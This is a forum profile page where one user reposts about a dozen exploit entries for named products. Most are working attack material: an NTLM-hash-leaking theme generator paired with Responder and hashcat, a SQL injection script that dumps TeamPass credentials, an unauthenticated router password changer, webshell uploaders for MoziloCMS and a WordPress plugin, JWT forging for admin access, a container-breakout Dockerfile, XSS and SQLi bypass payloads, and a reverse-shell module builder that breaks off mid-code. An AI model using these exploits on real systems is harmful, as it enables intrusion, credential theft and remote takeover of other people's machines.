Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    VeeVPN 1.6.1 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path # Date: 2024-12-27 # Exploit Author: Doğukan Orhan # Vendor Homepage: https://veepn.com/ # Version: 1.6.1 # Tested on: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname #Service Info C:\Users\PC>sc qc VeePNService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VeePNService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VeePNService DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  2. HireHackking

    Gitea 1.24.0 - HTML Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Gitea 1.24.0 - HTML Injection # Date: 2025-03-09 # Exploit Author: Mikail KOCADAĞ # Vendor Homepage: https://gitea.com # Software Link: https://dl.gitea.io/gitea/1.24.0/ # Version: 1.24.0 # Tested on: Windows 10, Linux Ubuntu 22.04 # CVE : N/A ## Vulnerability Description: In Gitea 1.24.0, the "description" parameter on the user settings page is vulnerable to HTML Injection and potentially Reflected XSS. The user-supplied HTML content is not properly sanitized, allowing it to be executed in the browser. When a user saves their profile description containing malicious HTML or JavaScript code, the payload successfully executes, confirming the vulnerability. ## Exploit PoC: [https://lh7-rt.googleusercontent.com/docsz/AD_4nXeh7FQb3EdM3-fPqRLqZ4Oh5JlVQdHjhBHEtPL5U9mEtTeWwiMdfx1SpyYC-Kg7EiWCy-Mpay8ZKz6WDw5hCYLrbCrAN2Dlg5xAnNIMuL9ui8ZNjH9GzD_rwdtjbGRkyoTP-uAd?key=pDzgPVQKg3NL0T6shAZ0U6Xz][https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-OZUDyqxfXQV92GwjmahRYFv7BzYhJ5lG2F6slXNyRVRcgyB2yNbK_NMkFkWbU6IggK4xOkUDP5aukMiEjFS18zIc3DDUR7M0wivQMF2aWRt91yx_ayb7AB556Uot1LVUaa1z8w?key=pDzgPVQKg3NL0T6shAZ0U6Xz] ## Paload:<h1>deneme</h1> ### **1. Request:** POST /user/settings HTTP/2 Host: demo.gitea.com Cookie: _gid=GA1.2.1249205656.1740139988; _ga=GA1.2.291185928.1740139987; i_like_gitea=d9da795e317a0ced; lang=tr-TR; _ga_WBKVZF2YXD=GS1.1.1740139987.1.1.1740140041.6.0.0; _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ Content-Length: 312 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Accept-Language: tr-TR,tr;q=0.9 Origin: null Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Priority: u=0, i _csrf=f9ITrnNQIzvSX-yvHX64qhoc_8w6MTc0MDE0MDY0MDQ2MTE0MDgyMQ &full_name=Abuzettin &description=%3Ch1%3Edeneme%3C%2Fh1%3E &website= &location= &visibility=0 &keep_email_private=on
  3. HireHackking

    Microsoft Windows - NTLM Hash Leak Malicious Windows Theme

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme # Date: 02/03/2025 # Exploit Author: Abinesh Kamal K U # CVE : CVE-2024-21320 # Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320 ## Step 1: Install Responder Responder is a tool to capture NTLM hashes over SMB. git clone https://github.com/lgandx/Responder.git cd Responder Replace `eth0` with your network interface. ## Step 2: Create a Malicious Windows Theme File ### Python Script to Generate the Malicious `.theme` File import os # Attacker-controlled SMB server IP attacker_smb_server = "192.168.1.100" # Change this to your attacker's IP # Name of the malicious theme file theme_filename = "malicious.theme" # Malicious .theme file content theme_content = f""" [Theme] DisplayName=Security Update Theme [Control Panel\Desktop] Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg [VisualStyles] Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles ColorStyle=NormalColor Size=NormalSize """ # Write the theme file with open(theme_filename, "w") as theme_file: theme_file.write(theme_content) print(f"[+] Malicious theme file '{theme_filename}' created.") # Optional: Start a Python HTTP server to serve the malicious theme file start_http = input("Start HTTP server to deliver theme file? (y/n): ").strip().lower() if start_http == "y": print("[+] Starting HTTP server on port 8080...") os.system("python3 -m http.server 8080") ``` ## Step 3: Deliver & Capture NTLM Hashes 1. Send the `malicious.theme` file to the target. 2. Run Responder to capture the NTLM hash: sudo python3 Responder.py -I eth0 3. Wait for the victim to open the `.theme` file. 4. Extract NTLM hash from Responder logs and crack it using hashcat: hashcat -m 5600 captured_hashes.txt rockyou.txt -- Abinesh Kamal K U abineshjerry.info MTech - Cyber Security Systems & Networks Amrita University
  4. HireHackking

    Jasmin Ransomware - SQL Injection Login Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Jasmin Ransomware SQL Injection Login Bypass # Google Dork: N/A # Date: 05-03-2025 # Exploit Author: Buğra Enis Dönmez # Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware # Version: N/A # Tested on: Windows How to exploit : --> Open Admin Panel Through : http://localhost/login.php --> Enter the SQL Injection Auth Bypass Payload to Email like : '=' 'or' --> And to Access Code, Enter the same SQL Injection Authentication Bypass Payload : '=' 'or' --> Press Authorize --> Congratz, you're in --> SQL Injection Authentication Bypass Payload : '=' 'or' --> Payloads Can be use : ' or '1'='1 ' or ''=' '=' 'or' ' OR '1'='1';-- - ' or 1 -- -
  5. HireHackking

    NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Container Breakout with NVIDIA Container Toolkit # Date: 17/02/2025 # Exploit Author: r0binak #Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit # Version: 1.16.1 # Tested on: NVIDIA Container Tooklit 1.16.1 # CVE: CVE-2024-0132 Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering. PoC link: https://github.com/r0binak/CVE-2024-0132 Steps to Reproduce: Build and run a docker image based on such a Dockerfile: FROM ubuntu RUN mkdir -p /usr/local/cuda/compat/ RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/ RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs RUN mkdir -p /pwn/libdxcore.so.1337/ RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1 RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2 The host file system will reside in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/ Regards, Sergey `*r0binak*` Kanibor
  6. HireHackking

    TeamPass 3.0.0.21 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TeamPass SQL Injection # Google Dork: intitle:"Teampass" + inurl:index.php?page=items # Date: 02/23/2025 # Exploit Author: Max Meyer - Rivendell # Vendor Homepage: http://www.teampass.net # Software Link: https://github.com/nilsteampassnet/TeamPass # Version: 2.1.24 and prior # Tested on: Windows/Linux # CVE : CVE-2023-1545 #!/usr/bin/env python3 import sys import json import base64 import logging import requests from typing import Optional, Dict, Any from dataclasses import dataclass # Configuração de logging logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s' ) logger = logging.getLogger(__name__) @dataclass class TeamPassExploit: base_url: str arbitrary_hash: str = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq' def __post_init__(self): self.vulnerable_url = f"{self.base_url}/api/index.php/authorize" def check_api_enabled(self) -> bool: """Verifica se a API está habilitada.""" try: response = requests.get(self.vulnerable_url) if "API usage is not allowed" in response.text: logger.error("API feature is not enabled") return False return True except requests.RequestException as e: logger.error(f"Erro ao verificar API: {e}") return False def execute_sql(self, sql_query: str) -> Optional[str]: """Executa uma query SQL através da vulnerabilidade.""" try: inject = f"none' UNION SELECT id, '{self.arbitrary_hash}', ({sql_query}), private_key, " \ "personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' " \ "FROM teampass_users WHERE login='admin" data = { "login": inject, "password": "h4ck3d", "apikey": "foo" } response = requests.post( self.vulnerable_url, headers={"Content-Type": "application/json"}, json=data ) if not response.ok: logger.error(f"Erro na requisição: {response.status_code}") return None token = response.json().get('token') if not token: logger.error("Token não encontrado na resposta") return None # Decodifica o token JWT token_parts = token.split('.') if len(token_parts) < 2: logger.error("Token JWT inválido") return None payload = base64.b64decode(token_parts[1] + '=' * (-len(token_parts[1]) % 4)) return json.loads(payload).get('public_key') except Exception as e: logger.error(f"Erro ao executar SQL: {e}") return None def get_user_credentials(self) -> Optional[Dict[str, str]]: """Obtém credenciais de todos os usuários.""" try: # Obtém número total de usuários user_count = self.execute_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''") if not user_count or not user_count.isdigit(): logger.error("Não foi possível obter o número de usuários") return None user_count = int(user_count) logger.info(f"Encontrados {user_count} usuários no sistema") credentials = {} for i in range(user_count): username = self.execute_sql( f"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1" ) password = self.execute_sql( f"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1" ) if username and password: credentials[username] = password logger.info(f"Credenciais obtidas para: {username}") return credentials except Exception as e: logger.error(f"Erro ao obter credenciais: {e}") return None def main(): if len(sys.argv) < 2: logger.error("Usage: python3 script.py <base-url>") sys.exit(1) exploit = TeamPassExploit(sys.argv[1]) if not exploit.check_api_enabled(): sys.exit(1) credentials = exploit.get_user_credentials() if credentials: print("\nCredenciais encontradas:") for username, password in credentials.items(): print(f"{username}: {password}") if __name__ == "__main__": main()
  7. HireHackking

    Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated) # Date: 2025-02-26 # Exploit Author: Amir Hossein Jamshidi # Vendor Homepage: https://www.aztech.com # Version: DSL5005EN # Tested on: Linux # CVE: N/A import requests import argparse print(''' ################################################################################# # aztech DSL5005EN router/modem - admin password change (Unauthenticated) # # BY: Amir Hossein Jamshidi # # Mail: amirhosseinjamshidi64@gmail.com # # github: https://github.com/amirhosseinjamshidi64 # # Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD # ################################################################################# ''') def change_password(ip_address, password): """ Changes the password of a device at the given IP address. Args: ip_address: The IP address of the device (e.g., "192.168.1.1"). password: The new password to set. """ url = f"http://{ip_address}/cgi-bin/sysAccess.asp" origin = f"http://{ip_address}" referer = f"http://{ip_address}/cgi-bin/sysAccess.asp" payload = { "saveFlag": "1", "adminFlag": "1", "SaveBtn": "SAVE", "uiViewTools_Password": password, "uiViewTools_PasswordConfirm": password } headers = { "Cache-Control": "max-age=0", "Accept-Language": "en-US,en;q=0.9", "Origin": origin, "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": referer, "Connection": "keep-alive" } try: response = requests.post(url, data=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"Password change request to {ip_address} successful!") print(f"Username: admin") print(f"Password: {password}") else: print(f"Request to {ip_address} failed with status code: {response.status_code}") print(f"Response content:\n{response.text}") # Print response for debugging except requests.exceptions.RequestException as e: print(f"An error occurred: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Change password of a device.") parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.") parser.add_argument("--password", dest="password", required=True, help="The new password to set.") args = parser.parse_args() change_password(args.ip_address, args.password)
  8. HireHackking

    MoziloCMS 3.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MoziloCMS 3.0 - Remote Code Execution (RCE) # Date: 10/09/2024 # Exploit Author: Secfortress (https://github.com/sec-fortress) # Vendor Homepage: https://mozilo.de/ # Software Link: https://github.com/moziloDasEinsteigerCMS/mozilo3.0/archive/refs/tags/3.0.1.zip # Version: 3.0 # Tested on: Debian # Reference: https://vulners.com/cve/CVE-2024-44871 # CVE : CVE-2024-44871 """ ################ # Description # ################ MoziloCMS version 3.0 suffers from an arbitrary file upload vulnerability in the component "/admin/index.php" which allows an authenticated attacker to execute arbitrary code on the "Files" session by uploading a maliciously crafted .JPG file and subsequently renaming its extension to .PHP using the application's renaming function. ##################### # PoC for webshell # ##################### Steps to Reproduce: 1. Login as admin 2. Go to the Files session by the left menu 3. Create a .jpg file with it content having a php web shell 4. Upload the file to the server via the upload icon and save 5. Rename the file to .php on the web server and save 6. Access webshell via this endpoint : http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php ========================== Request 1 => Upload File: # ========================== POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------186462060042780927583949521447 Content-Length: 607 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true Cookie: mozilo_editor_settings=true,false,mozilo,12px; 3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep; PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b; MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------186462060042780927583949521447 Content-Disposition: form-data; name="curent_dir" Willkommen -----------------------------186462060042780927583949521447 Content-Disposition: form-data; name="chancefiles" true -----------------------------186462060042780927583949521447 Content-Disposition: form-data; name="action" files -----------------------------186462060042780927583949521447 Content-Disposition: form-data; name="files[]"; filename="revshell.jpg" Content-Type: image/jpeg <?=`$_GET[0]`?> -----------------------------186462060042780927583949521447-- =========================== Request 2 => Rename File: # =========================== POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 98 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true Cookie: mozilo_editor_settings=true,false,mozilo,12px; 3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep; PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b; MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=files&newfile=revshell.php&orgfile=revshell.jpg&curent_dir=Willkommen&changeart=file_rename #################### # Webshell access: # #################### # Wenshell access via curl: curl http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php?0=whoami # Output: www-data """
  9. HireHackking

    Watcharr 1.43.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title : Watcharr 1.43.0 - Remote Code Execution (RCE) # CVE-2024-48827 exploit by Suphawith Phusanbai # Affected Watcharr version 1.43.0 and below. import argparse import requests import json import jwt from pyfiglet import Figlet f = Figlet(font='slant',width=100) print(f.renderText('CVE-2024-48827')) #store JWT token and UserID \ เก็บ token กับ UserID jwt_token = None user_id = None #login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token def login(host, port, username, password): url = f'http://{host}:{port}/api/auth/' #payload in login API request \ payload ใน json payload = { 'username': username, 'password': password } headers = { 'Content-Type': 'application/json' } #login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object try: response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200: token = response.json().get('token') if token: print(f"[+] SUCCESS! JWT Token: {token}") global jwt_token jwt_token = token #decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object decoded_payload = jwt.decode(token, options={"verify_signature": False}) global user_id user_id = decoded_payload.get('userId') return token else: print("[-] Check your password again!") else: print(f"[-] Failed :(") print(f"Response: {response.text}") except Exception as e: print(f"Error! HTTP response code: {e}") #craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน def create_new_jwt(original_token): try: decoded_payload = jwt.decode(original_token, options={"verify_signature": False}) #userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ decoded_payload['userId'] = 1 new_token = jwt.encode(decoded_payload, '', algorithm='HS256') print(f"[+] New JWT Token: {new_token}") return new_token except Exception as e: print(f"[-] Failed to create new JWT: {e}") #privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token def privilege_escalation(host, port, adminuser, token): #specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin url = f'http://{host}:{port}/api/server/users/{user_id}' # permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3 payload = { "permissions": 3 } headers = { 'Authorization': f'{token}', 'Content-Type': 'application/json' } try: response = requests.post(url, data=json.dumps(payload), headers=headers) if response.status_code == 200: print(f"[+] Privilege Escalation Successful! The current user is now an admin!") else: print(f"[-] Failed to escalate privileges. Response: {response.text}") except Exception as e: print(f"Error during privilege escalation: {e}") #exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin #usage if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.') parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True) parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080) parser.add_argument('-u', '--username', type=str, help='Username for login', required=True) parser.add_argument('-p', '--password', type=str, help='Password for login', required=True) parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True) args = parser.parse_args() #step 1: login token = login(args.host, args.port, args.username, args.password) #step 2: craft the admin token if token: new_token = create_new_jwt(token) #step 3: Escalate privileges with crafted token. Enjoy! if new_token: privilege_escalation(args.host, args.port, args.adminuser, new_token)
  10. HireHackking

    X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: X2CRM 8.5 - Stored Cross-Site Scripting (XSS) # Date: 12 September 2024 # Exploit Author: Okan Kurtulus # Vendor Homepage: https://x2engine.com/ # Software Link: https://github.com/X2Engine/X2CRM # Version: X2CRM v8.5 # Tested on: Ubuntu 22.04 # CVE : CVE-2024-48120 1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.” 2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered. XSS Trigger Request: POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1 Host: 192.168.1.108 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 390 Origin: http://192.168.1.108 Connection: keep-alive Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1 Upgrade-Insecure-Requests: 1 Priority: u=0, i YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create
  11. HireHackking

    KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) # Date: 3 September # Exploit Author: Okan Kurtulus # Vendor Homepage: https://kubesphere.io # Software Link: https://github.com/kubesphere/kubesphere # Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1] # Tested on: Ubuntu 22.04 # CVE : CVE-2024-46528 1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization). Note: The authorization level of this user is as follows: "Cannot access any resources before joining a workspace." 2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster. Examples of accessible endpoints: http://xxx.xxx.xx.xx:30880/clusters/default/overview http://xxx.xxx.xx.xx:30880/clusters/default/nodes http://xxx.xxx.xx.xx:30880/access/accounts http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking http://xxx.xxx.xx.xx:3 0880/clusters/default/monitor-cluster/resource http://xxx.xxx.xx.xx:30880/clusters/default/projects http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig
  12. HireHackking

    Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE # Original Author: Patchstack (hypothetical) # Exploit Author: Al Baradi Joy # Exploit Date: April 5, 2025 # Vendor Homepage: https://wp-timecapsule.com/ # Software Link: https://wordpress.org/plugins/wp-time-capsule/ # Version: Up to and including 1.21.16 # Tested Versions: 1.21.16 # CVE ID: CVE-2024-8856 # Vulnerability Type: Arbitrary File Upload / Remote Code Execution # Description: # The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16 # allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint. # This can lead to remote code execution if a PHP file is uploaded and executed directly # from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory. # Proof of Concept: Yes # Categories: WordPress Plugin, File Upload, RCE # CVSS Score: 9.9 (Critical) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Notes: # Successful exploitation provides shell access as the user running the web server. # Ensure target is using the vulnerable plugin version before launching the attack. import requests # Banner def display_banner(): print("="*80) print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging Plugin Arbitrary File Upload") print("Made By Al Baradi Joy") print("="*80) # Function to detect if the target supports HTTPS or falls back to HTTP def detect_protocol(domain): https_url = f"https://{domain}" http_url = f"http://{domain}" try: response = requests.get(https_url, timeout=5, allow_redirects=True) if response.status_code < 400: print(f"[✔] Target supports HTTPS: {https_url}") return https_url except requests.exceptions.RequestException: print("[!] HTTPS not available, falling back to HTTP.") try: response = requests.get(http_url, timeout=5, allow_redirects=True) if response.status_code < 400: print(f"[✔] Target supports HTTP: {http_url}") return http_url except requests.exceptions.RequestException: print("[✖] Target is unreachable on both HTTP and HTTPS.") exit(1) # Exploit function def exploit(target_url): target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) upload_url = f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php" shell_url = f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami" files = { 'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php') } try: print(f"[+] Attempting to upload shell to: {upload_url}") response = requests.post(upload_url, files=files, timeout=10) if response.status_code == 200: print(f"[✔] Exploit successful! Webshell available at: {shell_url}") else: print(f"[✖] Failed to upload shell. Status code: {response.status_code}") except requests.exceptions.ConnectionError: print("[✖] Connection failed. Target may be down.") except requests.exceptions.Timeout: print("[✖] Request timed out. Target is slow or unresponsive.") except requests.exceptions.RequestException as e: print(f"[✖] Unexpected error: {e}") # Main execution if __name__ == "__main__": display_banner() target = input("[?] Enter the target URL (without http/https): ").strip() exploit(target)
  13. HireHackking

    WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE) # Date: 3/22/2025 # Exploit Author: Swammers8 # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS # Version: 1.6.3 and prior # Tested on: Ubuntu 24.04.2 LTS # YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e # Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE #!/bin/bash # Make a zip file exploit # Start netcat listener if [[ $# -ne 2 ]]; then echo "[*] Description:" echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3" echo "[*] It will create an infected module .zip file and start a netcat listener." echo "[*] Once the zip is created, you will have to login to the admin page" echo "[*] to upload and install the module, which will immediately run the shell" echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master" echo "[!] Usage:" echo "[*] $0 <lhost> <lport>" exit 1 fi if [ -z "$(which nc)" ]; then echo "[!] Netcat is not installed." exit 1 fi ip=$1 port=$2 rm -rf shellModule.zip rm -rf shellModule mkdir shellModule echo [*] Crafting Payload cat <<EOF > shellModule/info.php <?php /** * * @category modules * @package Reverse Shell * @author Swammers8 * @link https://swammers8.github.io/ * @license http://www.gnu.org/licenses/gpl.html * @platform example.com * @requirements PHP 5.6 and higher * @version 1.3.3.7 * @lastmodified May 22 2025 * * */ \$module_directory = 'modshell'; \$module_name = 'Reverse Shell'; \$module_function = 'page'; \$module_version = '1.3.3.7'; \$module_platform = '2.10.x'; \$module_author = 'Swammers8'; \$module_license = 'GNU General Public License'; \$module_description = 'This module is a backdoor'; ?> EOF cat <<EOF > shellModule/install.php <?php set_time_limit (0); \$VERSION = "1.0"; \$ip = '$ip'; // CHANGE THIS \$port = $port; // CHANGE THIS \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = 'uname -a; w; id; /bin/sh -i'; \$daemon = 0; \$debug = 0; if (function_exists('pcntl_fork')) { \$pid = pcntl_fork(); if (\$pid == -1) { printit("ERROR: Can't fork"); exit(1); } if (\$pid) { exit(0); // Parent exits } if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } \$daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30); if 